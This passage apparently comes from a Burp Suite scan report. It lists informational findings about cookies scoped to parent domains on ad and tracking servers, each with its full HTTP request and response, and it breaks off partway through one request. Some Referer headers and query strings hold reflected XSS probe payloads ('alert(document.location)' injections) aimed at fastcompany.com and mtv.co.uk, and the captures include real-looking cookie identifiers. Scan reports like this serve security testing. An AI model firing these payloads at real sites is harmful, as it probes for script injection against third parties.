Path:   /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif HTTP/1.1
Host: counters.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ucid=RFq8Ln1vPSaBPMmq4LEJ0w==; _mkto_trk=id:672-YBF-078&token:_mch-gigya.com-1314893715569-60156; __utma=246645010.642220752.1314893716.1314893716.1314893716.1; __utmz=246645010.1314893716.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 12:48:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_1640683793=http://www.observer.com/; path=/
Set-Cookie: GF_1640683793=http://www.observer.com/; domain=gigya.com; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; domain=gigya.com; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; domain=gigya.com; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
10.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2
If-None-Match: "436874d-5d7-4aa4ddaecd340"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 11 Sep 2012 12:49:18 GMT;domain=.zedo.com;path=/;
ETag: "9e27dc-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=419812
Expires: Sat, 17 Sep 2011 09:26:10 GMT
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...
10.19. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r5075003
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2; FFgeo=5386156; FFcat=933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=1:0:0:0:0:0:0; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 11 Dec 2011 12:49:31 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=985B826,20|121_977#0;expires=Tue, 11 Sep 2012 12:49:31 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=8401
Expires: Mon, 12 Sep 2011 15:09:32 GMT
Date: Mon, 12 Sep 2011 12:49:31 GMT
Connection: close

GIF89a.............!.......,...........D..;


10.20. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669088Zc826000622%2C826000622Zs403Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=945
Date: Mon, 12 Sep 2011 12:48:46 GMT
Connection: close


10.21. http://dts1.raasnet.com/dts/bizo/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/bizo/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/bizo/in?industry=business_services&location=texas HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

10.22. http://dts1.raasnet.com/dts/exelate/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/exelate/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/exelate/in?segments=&t=i HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

10.23. http://dts1.raasnet.com/dts/targus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/targus

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/targus?segment=000&zip=&fage=&fgender=&fts=&sage=&sgender=&sts= HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

10.24. http://f21.360tag.com/t6/1418/MTV/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f21.360tag.com
Path:   /t6/1418/MTV/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t6/1418/MTV/?rf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=en-US&pg=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&pl=Win32&cd=16&rs=1920x1200&tz=300&je=true&rn=1405901022&at=PageView&tv=1&t360_T=2&t360_RN2=1967621374&t360_Referrer=&txd=360tag.com HTTP/1.1
Host: f21.360tag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: t1=N1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private,no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1066373836/?label=hLH-CJz7gQIQzKW-_AM&guid=ON&script=0
Set-Cookie: tguid=d37d83f3-b7f3-4436-ae61-5a4ec6697d9e; domain=.360tag.com; expires=Sun, 12-Sep-2021 13:05:06 GMT; path=/
Set-Cookie: tid=0; domain=.360tag.com; expires=Sun, 11-Sep-2011 13:05:06 GMT; path=/
Set-Cookie: sguid=466d899d-3f45-470d-9e6b-6f8d7ed32ebd; domain=.360tag.com; path=/
X-Powered-By: PHP/5.2.11
Server: Apache/2.2.14
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC", policyref="http://www.360tag.com/w3c/p3p.xml"
Date: Mon, 12 Sep 2011 13:05:05 GMT
Content-Length: 0

10.25. http://id.google.com/verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ciphertext+data+security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=VxiZX7aDTPwjxYwwBhemPWg4il135P9dB2f5oOVsmg=O6gY64Xq_XczkJ5S; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=yIRx5Ncw2Xe2RRfVKKbf2FR3nodRYFt3JPr2L80Fxg=WeGf3ZdyaGOKCq62; expires=Tue, 13-Mar-2012 12:41:17 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:41:17 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
10.26. http://id.google.com/verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=yIRx5Ncw2Xe2RRfVKKbf2FR3nodRYFt3JPr2L80Fxg=WeGf3ZdyaGOKCq62; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Set-Cookie: NID=51=Lh__unmUq20T1IIqPNby3lnxFSUZGdvQ5_BieXTCVwXmSNjk57-to0QCiQto54PtZva07UOavPS_hgWY0dmvp105NE76_GwJkql9ucFgdgF_oJRWulkjljosco7JuoGh; expires=Tue, 13-Mar-2012 12:41:23 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:41:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
10.27. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
10.28. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
10.29. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
